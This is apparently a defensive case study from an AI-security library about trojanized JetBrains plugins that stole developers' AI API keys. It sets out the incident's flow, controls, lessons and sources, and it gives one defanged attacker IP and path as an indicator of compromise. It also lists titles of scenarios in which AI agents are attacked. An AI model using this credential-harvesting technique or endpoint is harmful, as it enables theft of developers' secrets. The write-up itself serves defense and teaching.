Malicious JetBrains Marketplace plugins steal AI API keys
Real-world incident16 Jun 2026🗺️ Model / Package Supply ChainResearchers reported at least 15 trojanized JetBrains Marketplace plugins posing as AI coding assistants that silently exfiltrated the OpenAI/DeepSeek/SiliconFlow API keys developers pasted into them — ~70,000 installs, with stolen keys allegedly resold to paying users.
Root cause — why it happened
Developers installed plugins from the JetBrains Marketplace that advertised themselves as AI coding helpers built on tools like DeepSeek and OpenAI. The plugins worked exactly as promised — but they were also booby-trapped. When a developer pasted in their AI provider key so the plugin could call the AI, the plugin quietly copied that key to a stranger's server. The danger wasn't a poisoned AI model; it was that a tool the IDE trusted was handed a real secret and abused that trust, with no warning shown to the user.
Risks this case illustrates
Named in the standard (OWASP/ATLAS/NIST) lens. Click a highlighted component in the diagram below to see which risks attach where.
How it unfolded
An attacker publishes a working AI plugin to the Marketplace
Someone uploads a plugin to the JetBrains Marketplace that looks like a genuinely useful AI coding assistant — chat, commit-message generation, code review. It is published under an ordinary-looking vendor account, and it really does work.
Name: DeepSeek AI Assist Vendor: <one of seven publisher accounts> Features: AI chat · commit-message gen · code review · bug finding · unit tests Built on: DeepSeek / OpenAI / SiliconFlow Installs: ~27,727 (CodeGPT AI Assistant: ~25,571; ~70k across the set) # Works exactly as advertised. The malicious fragment is buried in working code.
Controls & guardrails — what would have stopped it
The cleanest fix is to never hand a long-lived secret to a third-party plugin at all — log in to the AI provider through a proper sign-in flow that gives the plugin a short-lived, revocable token instead of your master key. Failing that, two things would have caught it: vetting plugins like real software before installing (not trusting the listing), and watching the developer machine so a coding tool sending a key to an unrelated server raises an alarm. And if a key did leak, rotating it immediately is what actually shuts the attacker out.
- MCP/plugin pinning, manifest hashing & re-review
Review catches what reviewers understand; a subtle malicious directive can pass. Pinning helps only if you actually re-review on update rather than auto-accepting.
- Least-privilege identity & scoped credentials
Doesn't prevent manipulation — only caps its reach. Hard to get right operationally; over-broad scopes are the common real-world failure.
- Egress allowlisting & DLP on tool arguments
Allowlists fight an open-ended channel; legitimate-but-broad destinations (any URL fetch, any email) are hard to constrain without breaking usefulness. Encoding can evade naive DLP.
- Runtime monitoring & anomaly detectionaddressesSensitive Data Leakage
Detects the anomalous, not the novel-but-subtle; high false-positive rates cause alert fatigue. Always a step behind a sufficiently quiet attacker.
- Full-trace audit logging
Logging is forensic, not preventive — it explains harm after the fact. Useless if no one reviews it or if the materialised context isn't captured.
- Governance: risk assessment, red-teaming & incident responseaddressesSupply-Chain Compromise
Process reduces likelihood and speeds recovery but executes no technical control itself; weak follow-through makes it theatre.
Lessons
- ▸ Marketplace presence and a working feature set are not provenance — a fully-functional AI plugin can hide a small credential-stealing fragment that survives manual review.
- ▸ The most valuable thing an AI dev tool can steal is often the developer's own provider API key — voluntarily pasted in, long-lived, and immediately monetisable via reuse/resale (LLMjacking).
- ▸ Third-party IDE plugins run with the developer's privileges and open network egress; an egress boundary (allowlist + credential DLP) on the dev environment is the practical chokepoint for exfiltration.
- ▸ Keep secrets out of plugin custody: brokered, short-lived, per-tool tokens (OAuth) mean a future trojan has no long-lived key to exfiltrate in the first place.
- ▸ Once a long-lived key has left the machine, only rotation neutralises it — treat any secret entered into an affected plugin as compromised, and audit provider billing for unexpected usage.
Proposals & gaps this case surfaced
Non-destructive suggestions for the library — proposed, not adopted.
Third-party developer tools (IDE plugins, MCP servers) must not store or transmit long-lived provider API keys. Issue short-lived, scoped, revocable tokens via a broker/OAuth flow, and gate any first-time outbound transmission of secret-shaped data behind an explicit consent prompt — so a trojanized tool has no long-lived credential to exfiltrate and any attempt is visible.
This case shows a gap: we usually worry about poisoned AI models or tools that trick the AI. Here the trick was on the human — a trusted tool simply collected the secret the developer typed in, with no warning. We should treat 'a tool handles your credential' as its own risk, with rules about how plugins are allowed to hold and send secrets.
These surface as proposals across the Control Library and Risk Taxonomy; adopt them by hand when ready.
Sources
- Multiple JetBrains IDE plugins caught stealing AI keys — Aikido Security (primary research) ↗
- Malicious JetBrains Marketplace plugins steal AI API keys from developers — BleepingComputer ↗
- Malicious JetBrains Plugins Steal AI API Keys as Chrome Extensions Capture Chatbot Chats — The Hacker News ↗
- Fifteen JetBrains Marketplace Plugins Steal API Keys — Infosecurity Magazine ↗
- Malicious JetBrains Plugins Steal AI API Keys from Developers — Aviatrix Threat Research Center ↗
- Aikido Security — Multiple JetBrains IDE plugins caught stealing AI keys (primary research) ↗ — Campaign scope, install counts, IOC (39.107.60[.]51 /api/software/key), and the paid-tier resale inference.
- BleepingComputer — Malicious JetBrains Marketplace plugins steal AI API keys from developers ↗ — Independent reporting; JetBrains had not responded at publication, some plugins reportedly still available.
Practise the risk class — related scenarios
A support email hides instructions — and the assistant obeys them
A speed optimisation becomes a cross-tenant listening device
Compromise the pipeline that builds agents, and every new worker is born malicious
Two doors to the same secret: reconstruct the model through its API, or just walk off with the weight file
The forensic record is itself the attack surface — an agent's log is poisoned, then quietly rewritten
A cost-saving open-weights swap quietly ships a model with its safety surgically removed
A screenshot that's harmless at full size becomes an order once the system shrinks it
A capable third-party model that behaves perfectly — until it sees the trigger
An attacker captures the agent's bearer token — and inherits its authority
A trusted MCP email tool quietly BCCs every message to an attacker
A forged peer registers on the agent directory — and the planner enlists it
An inbox summary quietly ships a secret to an attacker's server